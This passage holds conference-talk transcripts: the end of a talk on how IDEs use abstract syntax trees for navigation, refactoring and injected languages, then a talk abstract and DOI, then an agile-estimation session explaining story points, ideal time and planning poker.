reference, we've got a target, we can do navigation to there, we can also do find usages because it's just a reverse lookup. We can then also easily do renaming because it's a reverse lookup and you change the name of the node, you sort of change the value of the node that the reference is attached to. And so all of a sudden this gives us... This is a very powerful tool. It's given us navigation, find usages, renaming, code completion, all with just these references between nodes, and cross-language stuff. Finally with ASTs, we've got the ability to manipulate the tree. And this allows us to do some really fun stuff such as refactoring and formatting. If we want to move a method to another class, we can take that method declaration node and all of its children and copy it into another tree. If we want to move it around within the file, we just move the nodes around in the file because it reserializes back to the text file. The AST is a full fidelity representation of the text file. We can then therefore just round-trip between the two. Any changes you make to the tree are applied back to the file. Any changes to the file are applied back to the tree.
And because the tree itself contains white space nodes as well, formatting is easily done as well. We just manipulate the white space nodes. We can take it even further again. And we can have...so not only can we have some multi-file abstract syntax trees, but we could do an injected abstract syntax tree. We have a lot of programming languages which are embedded DSLs, things like SQL or CSS snippets within the code or AngularJS expressions. AngularJS expression would be a string literal on a HTML attribute. And so we could do something like this. We've got another IntelliJ project here which has got a reference to a SQLite database. It's just got a simple person table in it. And we've got a reference built in there. It's got a connection to the database. And what we can do is something quite interesting. We can create a query string. This is going to be a bit of SQL, but there's no context to tell it's a SQL, sorry, a SQL string. So we can tell the IDE that this is going to be a SQL, SQL string, and it'll now start parsing that as a SQL expression. And because we've got the database connection in the IDE, we've got this integrated environment. If we call it SQL, we can now do IntelliSense and pull up person. We know that that's a SQL command and we can pull it up from there. And because we've got the context, we can take it a bit further and we can run the query in the console. And down here, then we get the output from that there by embedding the knowledge that that string is a SQL, is a bit of SQL language into another language. So timeliness is an interesting factor. If we're doing something like AngularJS, how do we keep that up to date? Languages change, but they tend to change reasonably slowly. It takes a year or so before languages will finalize on new details and make the changes. Framework changes happen a lot more frequently than that. The common view here, really, is that it's the parser that is the big issue here. It's not. The parser is not the bottleneck. Writing parsers, while it's a certain amount of legwork, is not the thing which holds all this back. The tricky thing now of adding extra support is the value-added stuff you can do on top of an abstract syntax tree, all the analysis you can write, all the changes you would make to a control flow. For example, C sharp 6 is having exception handlers, exception filters. So you can have a catch method with an if statement. That affects the control flow because if the if statement is always going to evaluate to false, then the content of that catch block is never going to fire. So we can flag that as dead code. But that's extra work we have to do on top of parsing the fact that a catch statement can have an if statement attached to it. Similarly, you want to add new quick fixes and context actions because the syntax has changed. You then need to be able to offer the support there to work with those new syntaxes. You want to be able to refactor into a primary constructor, for example. So there's a big cost of adding new features, really, sorry, adding support for new languages or new frameworks or changes to those is the feature intersection of how everything interacts together, testing it, how it's changed the existing code, making sure that your previous analysis and control flows and quick fixes and context actions are all still working. That said, we always want to be making this a whole lot easier and faster. We want to be able to do that. So parsers are a certain amount of legwork. 
They're not the big bottleneck, but it would all be better if we were able to do that quicker and easier. JetBrains has got a research project called Nitra, which is trying to make this a whole lot easier. It's the idea that you can create language tooling from grammar files. So you describe your grammar and from that, you get a whole bunch of stuff for free. It builds the parser, builds the abstract syntax trees. It also, though, takes annotations on those grammars to build automatic syntax highlighting, outlining, brace matching, differences, usages and renames and everything. We've got that one there. So what we've got here is an example grammar, which describes the grammar of a simple expression, a simple numerical expression. We've got operations down here, you know, plus, minus, times, and so on. And we've got start rules. We're also annotating them with whether they are numbers or expressions and so on. And so we can get a simple parser. And we can see here that it will parse that file. It'll generate syntax highlighting for us, even sort of outside of the IDE, and show us how we can build all that. So we can do... Nope. But there. But it's also evaluating that. So it's building a syntax tree, but it's also walking the tree to evaluate the contents of that tree. And it's building that for a custom DSL. You can do more complex things. So this is a grammar file which represents the syntax of the grammar file itself. So this is highlighting itself here. We're using the Nitra system in Visual Studio to provide keyword highlighting. So for using syntax module there, they're all defined down here. So we've got syntax and so on for implementing that. And you've also got your... Your outlining implemented here, automatically based on the grammar files. So that is kind of the fun stuff we can do right now with IDEs and what's the interesting stuff with IDEs right now. But what kind of other things are there that's going on? We've got abstract syntax trees going on sort of more or less everywhere. They're going on to the server side of things. Microsoft's using the Roslyn bits to power its reference source website. So you can browse your code, look at the find usages and so on there. It's also using it to power its code search. So you can type in a search for read text file, and it will then analyze the code, figure out what it's supposed to be doing, and return you something back from sites such as Stack Overflow and other answer forums. JetBrains has a similar platform based on the IntelliJ product, which is all in the cloud. And it is providing a similar way to browse your source code with proper highlighting and analysis and following the references and looking at all these kinds of things. We're using it for a review tool, which we currently don't have a name for. Can anybody hazard a suggestion, please? Let us know. Browser tools are also very interesting right now. They are blurring the lines between IDEs and browsers, really. They're providing a whole suite of tools in there from profilers to editors to visual designers. And Chrome has even got sort of IDE features, almost got its own project model here by implementing workspaces. So you can map a file system to the content of a website.
So you can then say that the files in this website are coming from these files over here, and you can even use the JavaScript debugging maps to say that this JS file is actually coming from a JavaScript file or this CSS is coming from a less file, which is also very cool. Visual Studio has got Browser Link, which allows two-way editing from your browser tool. So you can design stuff in Visual Studio. You can fire up the editor. You can run it in several browsers at the same time, editing in the browser tools, and that then gets replicated back into the source code in the IDE. And if you edit the source, that again gets replicated back to all of the browsers that are attached. It's very cool. Again, blurring the lines between what's going on. The editor surface is something that's very interesting as well. So traditionally, source code has been, well, is very much about text files, and it's all very static and plain and boring. But we've got these rich editors, you know, and they are limited at the moment to doing syntax highlighting, brace matching, outlining, and that's pretty much it. You know, perhaps we'll do italics every now and then, but that's kind of as far as it goes. Code Lens here is Microsoft's way of surfacing information to you without having to go and find it, displaying the number of references, the number of tests, passing and failing, links to your source control and bugs right from the source control, right from the source editor itself. It's worth pointing out, Atom's editor here as well. It's kind of a really, it's a node webkit application. That means it's all based on HTML. So the editor itself is a HTML surface. This allows us to do some fun stuff. So you can even use the developer tools against the editor itself. So given an editor with a plain bit of HTML in it, you can fire up the developer tools and you can walk down the HTML which implements the editor itself. So if we keep going, we get down to the lines and you can step straight in and then you're actually stepping over individual syntax elements. And then you can edit that and, there it is. Let's just change that to be italic. And now all of a sudden, all of our files, all of our tags in this file have become italic. You can then do something, you've got all the power of the web behind you to do this. Now, so you could see how you could put something more interactive in there. You know, it's web pages. You can use JavaScript. You can use SVG. You can use style sheets. So there'll be a lot more interesting things you can get done in there. And of course, then that leads us on to some interactive stuff. So Bret Victor's demo, Inventing on Principle, if you haven't seen it, you must go and see it on YouTube. It's a really interesting demo. It's about having an editor which, as you type, displays values on the editor surface so you can see how well you're doing with your implementation. It kind of combines the idea of a read-evaluate-print loop with the editor surface and TDD. So it's kind of doing everything at once. You get to see that it's working. And you get to tune your algorithm or your bit of code as you're working with it. Lighttable is a working example of this for Clojure and JavaScript. But there's a lot of... There's a question, though, there whether that is... You have to implement certain styles of programming for that or use specific languages. It's hard to know whether this is something which can be applied on a wider scale with broader topics and broader languages.
And of course, Apple have done this now in a shipping IDE with their Swift language, which they've just announced this week, where you've got a playground where you can build a scene. You can see that animated as you type and as you work on it. And you can have a graph which shows you the values of your variables over time. And frankly, that then brings me to the end of everything. That's pretty much all I wanted to talk about. I wanted to just sort of look at some of the things behind the scenes, some of the syntax trees and the interesting things we can do from that, what that gives an IDE, and where we can take all of that. So, yes. There we go. So, any questions? No? Okay. Well, thank you all for coming.
|
We developers often take IDEs for granted. But have you ever wondered what’s going on under the surface? I’d like to pull back the curtains on the inner workings of the modern IDE, see where the state of the art is now, and look where it’s heading for the future. We’ll take a tour of the wealth of features provided, and take a deep dive into how the IDE knows so much about your code, and how it can provide such fast navigation and safe refactorings. We’ll also look at why some people are choosing to move away from IDEs and back to text editors, and what the future holds, with projects such as Nitra, Roslyn and Lighttable.
|
10.5446/50847 (DOI)
|
I had too much fun during the break taking one-on-one questions, so I didn't get all this stuff passed out. Apologies for that, but we'll get these things passed around in plenty of time. We're going to talk about estimating, talk about estimating projects. To do this, I want to start out with an idea of what is agile planning, right? What are we after here with a project? Agile planning is all about separating our estimates into two different levels. We have the thing called a product backlog. Our product backlog is big, visible features. We have a thing called a sprint backlog or iteration backlog. The iteration backlog are small tasks. We're going to talk about two different types of estimating. Our focus is going to be on putting estimates on those things on the left, right? The product backlog items. If you're in the session that we just had last hour, we talked about user stories. These things on the left would be user stories. We're going to talk about putting estimates on those. The focus over there. What I'd like to have you do to get started here, we'll get more of these cards passed around. You don't need them for what we're going to be here to get started with. I'd like you to estimate two things for me to help us get started. Our two estimates I'd like you to come up with, and the best is going to be to discuss this. Just turn around and talk to whoever is next to you about this. Two real simple things. How long to drive from right here to Paris? You can take whatever fairies you'd like to do from here to Paris. How long to read the last Harry Potter book? Don't cheat and look it up on Google or Amazon or anything like that because I don't really care about the answer. What I care about, I care about a lot, is us learning something about real world estimating. Two real world estimating tasks up there. Estimate how long to drive to Paris, how long to read the last Harry Potter book. Talk about that and see what you can come up with. Okay, let's talk about it. Who's got an estimate for me on Paris? Somebody just shout out a Paris estimate. How long to get to Paris? Two of them, 24 hours. Somebody else? Couple of days? 16. Right? Okay. There's a difference in telling somebody I'll be there in 24 hours and a couple of days. Those probably really mean the same thing. But often the unit we use to convey the estimate tells us something about our level of confidence in that estimate. If you tell me I'll be there in 24 hours, I might think you're going to be there in 22 to 26 hours. If you tell me I'll be there in a couple of days, that'd be Sunday, maybe Monday. I'll cut you a little more slack because you gave me your estimate in the precision of days. If instead you tell me 24 hours, I'll be there in 1440 minutes. Wow, you're going to be pretty precise. I might cut you slack 15 minutes plus or minus. Right? So how we convey an estimate tells us something about our confidence in that estimate. How long to read Harry Potter? Two weeks, how many hours? 12 hours? 52 hours? Yep. It depends. It depends on a lot of things. It depends on why we're reading it. You're not reading this for pleasure. You're doing the final copy edit on it, making sure all the commas are in the right place. It would depend on that. It could depend on whether you're reading it in the original Latin or not. Wouldn't Harry Potter one of the original Latin classics? Actually, I looked at that. You can buy Harry Potter in Latin if you're interested. 
I don't know why you would be, but somebody bothered to translate it into Latin. What we did there with a couple of real world estimating things is probably this. On one of those, you might have thought about a comparison. You looked at the last Harry Potter book and said, you know what, I haven't read that one yet, but it's like the sixth book. It's like the earlier book. It's a little bit longer than the previous book. Now, I remember reading the previous book, it took me about 12 hours. This one's probably about 14 hours. Or you might have thought about Paris and said, well, I've never driven to Paris before, but I do remember driving to Vienna a few years ago. Based on that drive, my drive to Paris would be such and such amount of time. This is called estimation by analogy, estimation by comparison to something else. The other thing you might have done is you might have thought about, for example, the number of pages in Harry Potter, the number of kilometers to Paris. I'll just make it easy with the math. You might have thought about Harry Potter and said 600 pages. I bet we read 40 pages per hour. I'm done in 15 hours. 600 divided by 40 is 15. This would be thinking about the size of the work. The reason I wanted you to do those two things was to stress that with real world things, we do not just jump in and give an estimate. We think about the size of the work. You thought about the number of pages or you thought about the number of kilometers to Paris. This is a natural real world best practice way to estimate. On software, unfortunately, when asked how long will it take, we often just go three weeks. We don't think about the size. Because estimating the size of software is hard. What we're going to try to do today is to come up with a measure that we can use for size. Something that we can use for size. We've used past ones in the industry. They used things like lines of code in the past. IBM actually really did it in the 60s. They gave a bonus to the programmer who wrote the most lines of code. Nice idea, you'd think of that, but wouldn't you catch yourself like two minutes later and go, oh, that won't be good? They actually went through with it. Gave a bonus to the programmer who wrote the most and you can imagine what happened. They got a whole bunch of code. So they didn't get any more done than they would have with less code, but they got a lot more code. So what we're going to try to do is we're going to try to estimate the size of our project and then separately derive the duration. This to me is fundamental. If in this one hour session I get you to remember four words, those are the four words on top of the screen. Estimate size, derive duration. Treat these as separate steps. How long will it take to read Harry Potter? Step one, it's 600 pages. Step two, divide. Estimate the size, and from that derive the duration. As an example, I'm going to introduce a unit for this in a moment, but before I introduce the unit, let's just think about something silly. Put the spec on the scale and weigh it. We got a very heavy spec here. We run a sprint. We finished 20 kilograms of spec. We'd look at that and we'd say we have 15 sprints or iterations to go. Just using this because I didn't want to introduce the unit yet. The unit that I want to introduce for doing this is going to be something you might have heard about, story points. In the past, we've used other things. In the past, we've used things, like I said. We've used lines of code. We've used function points. Agile teams use different units.
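As plain arithmetic, that derive-duration step is just a division. A tiny sketch with invented numbers, purely for concreteness:

```typescript
// "Estimate size, derive duration": the weigh-the-spec example, with made-up numbers.
const totalSize = 320;                               // total estimated size: story points, pages, kilograms of spec...
const velocity = 20;                                 // size actually finished in the last sprint
const remaining = totalSize - velocity;              // 300 left after one sprint
const sprintsToGo = Math.ceil(remaining / velocity); // 15 sprints or iterations to go
console.log(sprintsToGo + " sprints to go");
```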
Agile teams use story points and ideal days. Those are the measures we use. Story points is the one I want to focus on. Story points are the better of the two units. I want to focus on story points. Story points are a measure of how long something will take. Story points are absolutely a measure of time. A lot of teams make story points harder than they should be by making story points about complexity. They will say we're going to estimate complexity. They might even rename story points. They'll call them complexity points. I can assure you story points are not about complexity. complexity is a factor, complexity influences the amount of time something takes. But what we're estimating is how long something will take as influenced by things like risk, uncertainty, and complexity. Risk, uncertainty, and complexity influence it, but they are not what we estimate directly. Let me give you an example of story points using something different. Suppose we go outside and I point to a building over here and I say that building over there is one unit away. Not one mile, not one kilometer, not one minute, just one unit of time away. Not a trick question. I just want to make sure we're all okay with that so far. Everybody okay with me calling that randomly pointed to building one unit away? Just a number. Call it 100 if you wanted. I'm going to call that building one unit away. Now I point to another building and I say that building over there is two units away. That building is twice as far away. It's going to take twice as long to get to. I'm going to call that two units. Now what's nice with this is you and I can agree. You and I can agree that that building is one and that building is two. Even though we're going to walk there at different rates. You are going to walk there very quickly. I broke my leg and I have to hobble over there on some crutches. It's going to take me a lot longer to get to that building than you. But you and I can agree. That building's a one. You're looking at that building thinking it's a five minute walk. I'm looking at that building thinking that's about a ten minute walk. On these crutches that's about a ten minute walk. But you and I can agree to call it a one. And that one is a two. If we tried to use time think about what would happen. I'd point to that building and I'd say it's a ten minute walk. And you would tell me I'm crazy. You would say it's a five minute walk. We'd argue five ten five ten five ten we'd both be right. There's nothing literally nothing we can do to agree because we're both right. It is a five minute walk for you. It is a ten minute walk on my crutches for me. When we use an abstract unit we can agree. I want to put a building behind me. There's a third building back here behind me. The building behind me is physically the same as our two point building. So I kind of want to call it a two. It's the same physical distance as the two. But in order to walk to the two point building there's a train track that goes by. And I have to wait for the train to go by. And sometimes the train goes by at two o'clock. Sometimes at three o'clock. Sometimes at one. Sometimes it doesn't go by at all. Sometimes it's a short train. Sometimes a long train. There's extra risk or uncertainty in getting to that building back there. So when I think about that building I want to call it a two. But I have this extra risk or uncertainty and that makes me adjust my estimate up. I call it a three because of risk or uncertainty. Complexity can be a similar effect. 
I'll give you a complexity example in a moment. So what we're estimating is still and always time. How long will it take? But we use an abstract unit that lets people who produce at different rates agree. We do this with currency. I landed here on Saturday. I went to an ATM. I put my card in. I got some money out. What's a 50 worth here? What's a 50 worth? Half of a hundred. Right? Right? Two bottles of water maybe. I bought a couple of bottles of water this morning in case I got thirsty while talking, and they were 60 for the two bottles of water. So a 50 is worth half of a hundred. A 50 is worth a fourth of a 200. A 50 is worth what you can exchange it for. It's a relative unit. I can't show up. I assume I can't show up. We can't do this back in the US anymore. I can't go show up at your central bank and go give me the gold. Used to be able to do that. Now it's just kind of a random arbitrary unit of exchange. It's got the benefit that a couple billion people around the world can agree on what a Kroner's worth, but it's essentially this abstract unit of value. Just like a story point is. A story point will never have billions of people agreeing on it, of course. Let me give you an example of complexity. I got this example from a class. I love this example. Suppose you have a two person team, a brain surgeon and a little kid. You have a two item product backlog. Perform simple brain surgery, lick a thousand stamps. If we make a simplifying but valid assumption that the right person for the job will do the job. The surgeon will do the surgery. Those two things are chosen to take the same amount of time. The brain surgery and licking a thousand stamps are going to take the same amount of time. If that's true and if we make the assumption that the surgeon does the surgery, those two things get the same number of story points even though one is dramatically more complex. Story points are not about complexity. Complexity is an influence. Uncertainty is an influence. Risk is an influence. But they're not what we estimate. What we're estimating directly is time. This has to be true because if you're like me you've never had a boss come up to you and say hey, I don't care how long it's going to take but I'm worried about your brain. How hard are you going to have to think on this project? Your boss doesn't ask you that. Your client doesn't ask you that. Your boss or client wants to know how long it's going to take. So complexity is a factor, an influence on how long something is going to take. It's a factor in the effort. Story points are weird. So I want you to do something even weirder. Here's the weirder thing I'd like you to do. I'd like you to estimate eight zoo animals for me. And again don't cheat and look them up on Google. I'd like you to just talk about these in some groups again because it's more fun if there's a couple of us arguing the positions here. So in groups just take a few minutes. Estimate these animals in zoo points where a zoo point is a combination of mass and volume. Somehow how much animal there is. How much giraffe there is. Take a few minutes, estimate in zoo points. Okay, let's go ahead and talk about these. Anybody got good numbers that I can use for our example here? Somebody get through all or most of these? Somebody's got to help me out. Somebody got some numbers? So I heard a 100 for which animal? So a 100 on...I didn't have the zebra on the list. Oh, didn't I bring up the list? Well, that kind of sucks.
Let's just do it out loud together then. Oops. I'm not looking at what you look. I got you a different presentation up here. And it was up on mine. It must have been off by one on the slide. I'm sorry. Somebody give me a number for a lion. What do you think on a lion? A five? Let's go with five on the lion. First number I heard. What about a kangaroo then? If a lion's a five, what's kangaroo? Kangaroo about two-thirds of a lion? You never see them together in the zoo, do you? So...is that a little too low? Let's go with it. Five and three for now. What about rhinoceros? Eight? Is rhinoceros about a lion plus a kangaroo? I think they're bigger. Fourteen I heard. Fourteen to be about three lions? They seem bigger to me. So, well, let's go with the fourteen to start with. What about bear? Who's got a number for bear? What kind of bear? And somebody yelled out six. I gave you a vague requirement. With bear, I gave you a vague requirement. When you have a vague requirement, the best thing to do is ask what kind of bear. Or, if your product owner or your key stakeholder doesn't know what type of bear doesn't know the answer, the best answer is to use a range. I don't know. Maybe we're going to put a koala bear in the zoo. Maybe we're going to put a big ice bear in the zoo. This could be anywhere from two to fifteen. So, using a range. What about hippo? I'll jump down to hippo. About the same as a rhino. So, whatever we'd settle on for a rhino. I actually looked those up at one point. And technically, hippopotamus a little bit bigger. But I'm going to look at those and say, you know what, close enough, let's just call them the same size. Now, let's go with, let's say hippo is a twenty. Let's say rhino and hippo are twenty. I realized I missed one on here. What do you want to put on a blue whale? A couple of thousand. A couple of thousand? Right? That might be pretty close. You break it down. This is where I was worried the World Wildlife Fund is going to walk by. There's a guy there who's going to break down the blue whale. Let's get him. So, yeah, I'd want to break that down. It's too big to estimate. We are good estimators. We get a bad reputation for estimating. Software people, humans in general, kind of bad at estimating. We're not too bad if we stay in a one to ten range. When we start to get out of that range, that's when we're really bad. You and I could go to a zoo and look at a hippo and a rhino and go, a little bit bigger. We could get a lion and a tiger and look at those and decide pretty well. When we look at the blue whale, that's going to be hard. It's not going to be in that one to ten range. Think about walking into the reptile room at the zoo. You're looking at some little snake. How's that snake compared to the zebra? It's going to be hard. One to ten range? We're pretty good. Meaning most of our product backlog items, we're going to want to keep them in a one to ten range. Suppose I gave you another zoo animal up here. If I gave you cheetah or jaguar, I don't mean the car. If I gave you cheetah or jaguar, the way you would estimate those is you would look at your backlog, you would find something similar, probably tiger or lion, and you'd estimate relative to that. You'd go, okay, a cheetah's a little bit smaller than a lion. You'd pick a number based on what you gave lion. This is called relative estimating. Relative estimating is hard to get started with, but it gets easier as we go. 
It gets easier as we go because what you're doing is you're looking for things that are similar. What's like this? We don't have to go back to kind of first principles and break something down into all of its steps. We just have to say, what's it like? I have no idea how much a lion eats in a day, but if we are planning the trucks that are going to deliver food to our zoo, I'm okay making an assumption that a lion and a tiger eat about the same. They look about the same, kind of similar animals. I bet those things eat about the same. We can just call those the same number. These are story points. The other type of unit agile teams will sometimes use is called ideal time. Ideal time is much easier than story points. Ideal time is how long something is going to take if three things are true. It's all that you work on, nobody interrupts you, and everything you need is sitting on your desk when you get started. Meaning there's no waiting time, no interruptions, you're entirely focused. We call it ideal time because those things never happen. Now, if you think about ideal time, you might think about reading the Harry Potter book. We had somebody yell out, I think, 14 hours. I'm going to read the Harry Potter book in 14 hours. Well, I doubt that that answer meant that I'll be finished at two in the morning. Starting at noon, I'll be done at two in the morning. No, the answer probably meant I will have the Harry Potter book in my hands for 14 hours. I might read for an hour a day. You want to know if it's a good book? Check with me in two weeks. I'll have the book in my hands for 14 hours. Not I'll be done in 14 hours. So there's a difference here between ideal time and elapsed time. I want to give you the best example of this. It's such a great example. I'm going to give it to you even though it's very US centric. I know you're undoubtedly not a fan of my football. You probably like your own football. You don't want a big fan of American football. But if you've ever seen American football for even a minute, you're going to follow this example here. American football has four 15-minute quarters. The clock starts at 15, counts down. So theoretically, an American football game takes an hour. If you've ever started to watch one on television, even a minute of it, you know that it doesn't take an hour. It takes about three or four hours because that clock stops all the time. Now, I need somebody in the room who's not a big fan of American football to help me out with this question. Remember, an American football game has four 15-minute quarters. That would be kind of its ideal time estimate. So somebody who's not a big fan of American football, if I asked you to estimate the amount of time, an ideal time, that my home team's first game of the year is going to take, an ideal time, how long would you say? 60 minutes. Four 15-minute quarters. That's real easy. You don't even have to be a fan. Now, if you really wanted to know how long it's going to take, you'd have to know all sorts of things. In real time, if the team plays a team that causes a lot of injuries, the clock stops when there's an injury. The clock stops when somebody throws the ball and the guy doesn't catch it. Clock stops for all sorts of stuff. If somebody runs out of bounds, the clock stops. They want to sell TV commercial ads. They clock stops. So the clock stopping all the time, you'd have to know all sorts of stuff to tell me that that game is going to take three hours and 27 minutes. 
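If you want the same gap as a tiny calculation, and the pace numbers here are my own assumptions purely for illustration, it really is only a division:

    # Illustrative only: ideal time versus elapsed time.
    harry_potter_ideal_hours = 14        # hours with the book actually in my hands
    reading_hours_per_day = 1            # assumed pace, roughly an hour a day
    elapsed_days = harry_potter_ideal_hours / reading_hours_per_day   # 14 calendar days

    football_ideal_minutes = 4 * 15      # four 15-minute quarters
    football_elapsed_minutes = 3.5 * 60  # roughly what the broadcast really takes
    print(elapsed_days, football_ideal_minutes, football_elapsed_minutes)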
Much easier to estimate in ideal time than elapsed time. So when we think about your office, I think you guys have a 7.5-hour work day. I got an 8. So I think about an 8-hour work day. I got 40 hours in the week. But I'm not going to have 40 hours on the keyboard. I might have two hours in meetings, two hours there, maybe eight hours in email, only four hours left for the project. So I'm not going to make progress at a rate of one hour per hour. I'm not going to read Harry Potter in 14 hours on the clock. It's going to take longer. So this is what ideal time is about. The big thing to be careful about when estimating in ideal time is you've got to be careful that what's being asked is what's being answered. If your boss walks up and says, how long to read Harry Potter? And you say 14 hours. You better be sure your boss doesn't expect you to be done in 14 hours. You better be sure your boss knew that that was an ideal time estimate. That will only take me 14 hours. But I'm full time on this other project right now. I won't be able to get to it for two weeks. So it's often the case that what's being asked is not what's being answered. I like story points. I think there are a couple of compelling advantages to story points. Story points are additive. Time-based estimates are not if we produce at different rates. If you and I walk at different rates, we cannot add your five-minute estimate to my ten-minute estimate. You're estimating in your time. I'm estimating in my time. They're not the same unit because we produce at different rates. With story points, we can. We can add story points because they're relative. Story points also help avoid problems that get introduced into projects where teams will confuse hours and days. They'll mix up their units and it leads to problems. I want to show you an example of these confusing units. So here's a team, back to our original picture this afternoon when we first started the session. The team has estimated their product backlog in hours and they've estimated their sprint or iteration backlog in hours. This team has hours for both of those, their stories and their tasks. Here's what's going to happen. They're going to run a sprint and they're going to do all those tasks on the right. Then someone is going to say, when will you be done? I want to know when we're going to be done with this project. Well, the way we're going to figure out when we're going to be done with this, we're going to add up how much work we've got left. So I can't see the slide up here, but we're going to add up the hours over here. There's 140 hours left: 50, 50, 20 and 20. 140 hours left. We've got 140 to go. Well, how much did we do last sprint? Well, let's add up what we did last sprint. We add up what we did last sprint. It was 35 hours over here on the right. 12 plus 8 plus 4 plus 6 plus 5 is 35 hours. Now, I've made up the numbers here to make the math easy, but this example is realistic. I see this all the time. The math here is made up. So we're going to say 140 hours to go. We finish 35 hours per sprint. We'll be done in four sprints. 140 divided by 35 is 4. We'll call that 35 our velocity and we'll say we're done in four sprints. There's a big problem with what I just did there. There is a huge problem with what I just did there. I mixed up units. Let's not call these hours. Let's call these, on the left, hours we pulled out of the air. The team did not spend a lot of time doing that estimating. They just took a couple of minutes on average to estimate their user stories.
So those are hours we pulled out of the air. Sprint planning takes a lot of time. So let's call these hours we thought a lot about. I cannot take 140 hours we pulled out of the air and divide it by 35 hours we thought a lot about. They're different units. They're different units. I like how philosophers talk about knowledge. Philosophers split knowledge into two categories. They talk about what they call a priori knowledge, knowledge without experience. Before I have experience, here's what I think. That would be those things on the left. I don't have any experience doing these things. We haven't built them yet. So a priori, those are my estimates. Philosophers talk about a posteriori knowledge. Knowledge with experience after I get experience. The 35 hours over here are knowledge with experience. Now look at the first user story. It was 30 hours. When we planned it into a sprint and we did the sprint, it turned into 35 hours. We need to be careful and do the math the right way. The right way to do the math here would have been 140 hours divided by what? Somebody got an idea? By 30. I should have divided 140 by 30. I should have used units all from the product backlog. Dividing it by here is kind of mixing up the units that we use. So I want to take 140 hours and divide it by 30. In which case I get five sprints. So when I see this on projects, I do all the time, these projects are one to two sprints late. Because they tend to use this over here as their velocity on the right, and that gets overstated. If we used story points, I'm just going to make these smaller numbers. If we use story points, no one's going to make the mistake. They're not going to say, well, when are we done? Let's add it up. We got 14 story points, five plus five plus two plus two. What's 14 story points divided by 35 hours? I don't know, I can't do that math. 14 points divided by 35 hours doesn't make sense. So this will lead teams to doing the right math. 14 points divided by three points will be done in five sprints. So I like using different units on the product backlog. We put numbers on the product backlog in story points. When we go into sprint planning, if they're on the right, that teams will do in hours. So we're going to do different units. We're going to practice estimating slightly different way. We saw that we passed around a bunch of what are called planning poker cards earlier. We're going to use those. I want to have you guys get a chance to practice something. So we're going to do this with a technique called planning poker. Planning poker is a consensus-based estimating approach. It involves a product owner showing up with a stack of items, reading those items to the team. Team members asking questions. The product owner answers the questions. Team members have cards. On those cards are numbers that we're going to use. We use cards because that prevents us from using every number. I don't want to get in an argument with you. 17 versus 18. Those two numbers are too close to one another. We can't tell a 17 from an 18. So let's use cards that have on them the numbers that we've agreed to use. So our product owner reads a story. The team members ask questions. As soon as everybody thinks they have an answer, they hold their card up. Don't show it yet because that will influence your teammates. Just pick your card up. Normally a scrum master or coach, somebody will say one, two, three, turn them over. We turn them over. We all got the same number. Write it down. We're done. 
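One quick aside before we get to what happens when the cards don't match: the unit mix-up from that burndown example is easier to see written out. This is just the made-up slide numbers again in a small Python sketch, nothing new:

    # The made-up numbers from the slide, nothing more.
    backlog_hours_left = 140       # "hours we pulled out of the air": 50 + 50 + 20 + 20
    sprint_task_hours_done = 35    # "hours we thought a lot about": 12 + 8 + 4 + 6 + 5
    backlog_hours_finished = 30    # what the finished story was worth on the backlog scale

    wrong = backlog_hours_left / sprint_task_hours_done   # 4.0 sprints, but it mixes two units
    right = backlog_hours_left / backlog_hours_finished   # ~4.7, so call it 5 sprints

    # With story points the wrong division cannot even be written down sensibly:
    points_left, points_per_sprint = 14, 3
    sprints_left = points_left / points_per_sprint         # ~4.7, so call it 5 sprints

Backlog units divided by backlog units gives sprints; a priori guesses divided by a posteriori task hours quietly mixes the two.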
If we don't all agree, vote again. Here's an example. I get these four estimators. We get two fives. Yeah, there's my favorite team, my teammates. We get two fives, an eight and a 20. If we had those numbers, I would ask Johannes, why a 20? Why do you think this is so much bigger than the rest of us? Anna or Tron could comment, but I really want to hear from Johannes. We vote again. Maybe he says something to influence us. Everybody else comes up to an eight, but he's still got a 13. We still differ. I would ask him to take another round or two trying to convert us. Help us see why you think this is bigger than the rest of us think. We don't vote. We don't at this point say the eights win. I repeat this process until we come to agreement. I want the team to come to agreement on this. The agreement might be a little false. Johannes does not have to go to his grave defending an eight, but I need him at some point to either convert the other team, the rest of the team, or I need him to fold. I need him to say, okay, I don't have any more arguments. I mean, eight versus 13, not a big difference. I fold, I'll go with an eight. So I want him to fight a few more rounds, but I'd eventually want him to fold and go with the rest of the team on this, if he can't convert them. You guys ready to practice? Okay, I passed around sheets of paper at the start of our session here. If anybody doesn't get it, let me know. We can get more passed around. Hopefully there's some floating around. I'll keep it up here on the slide up here too, and it is up there this time. Here's a product backlog for you. You've got planning poker cards. Here's what I recommend you do. In groups, we've got to do this in groups so we have discussion, look for a two. No planning poker, just look for a two. Once you've found a two, look for a five. Maybe you don't find a two and a five, you find a three and a five, or a three and an eight, but I want you to find two numbers that start to span our one to ten range. Remember, we're only good in the one to ten range. So look for two numbers that span the one to ten range, then play planning poker on a few more of these. So look for a two and a five. After you've done that, play planning poker. We'll talk about this for a few more minutes afterwards. So give it a try. Need more cards or handouts, let me know. And I do encourage you to do this in small groups. So you get the benefit of this and get a feel for what this is like. All right. We are pretty much close to done though. So I just kind of, we're kind of at the end here. I want to see what type of questions you have from doing that. Any thoughts on estimating? We haven't done anything in terms of putting this together into a plan yet. Right? This session was on estimating. If you go back to the early slide, we had estimate size, derive duration. We've estimated the size. We haven't derived the duration yet. We're going to do that in the next session I've got in here. It starts in an hour. We'll talk about how to turn this into a plan. I want to pause here for questions you might have on the estimating side of this. Makes sense, I hope, with story points being about time. Yes, question or comment? So an estimate is going to be dependent to some extent on who does the work.
We're going to want to make an assumption on an agile team that when we go to sequence the work, when we go to plan the work, sprint planning, iteration planning, then we're going to do the best we can there to have the right person doing the job. So if you're our JavaScript person, we're going to have you do the JavaScript stuff. I'll do the database stuff. So that becomes kind of a sequencing issue. At this level, all we're really looking at is kind of the overall size of things. The problem that we may run into from that is that we say the size of the project is this big and we think you and I together can go to a certain pace, but it turns out we can't because all of this is JavaScript work. So the problem you're describing is really going to be a sequencing issue that we can handle during sprint planning unless all of our work is really skewed in one direction. Well, so the comment is we want people to get cross trained. I want the JavaScript guy to learn Oracle the other way around. Absolutely taking people outside of their skill and to learn new skills is a very valuable thing that is going to help us be better as a team over the long term. In terms of does it matter when we put an estimate on there who's going to do it? It really doesn't at the level of estimating because you are a fast walker. I'm a slow walker because of my crutches, but we established that you and I can still call that building a one and that building a two. What's going to matter is if I, the slow walker, walk to that building, it's going to take me twice as long. But that's going to free you up our fast walker to walk to some other building. Assuming there's one skill set walking to buildings, JavaScript, whatever it is. So in terms of the size we put on, it's not really going to matter who does the work. It's going to matter only when we go to actually sequence the work that we make sure the right person for the job does the job. At the higher level, putting a size on it, that doesn't really matter. In fact, that's the main benefit of story points is 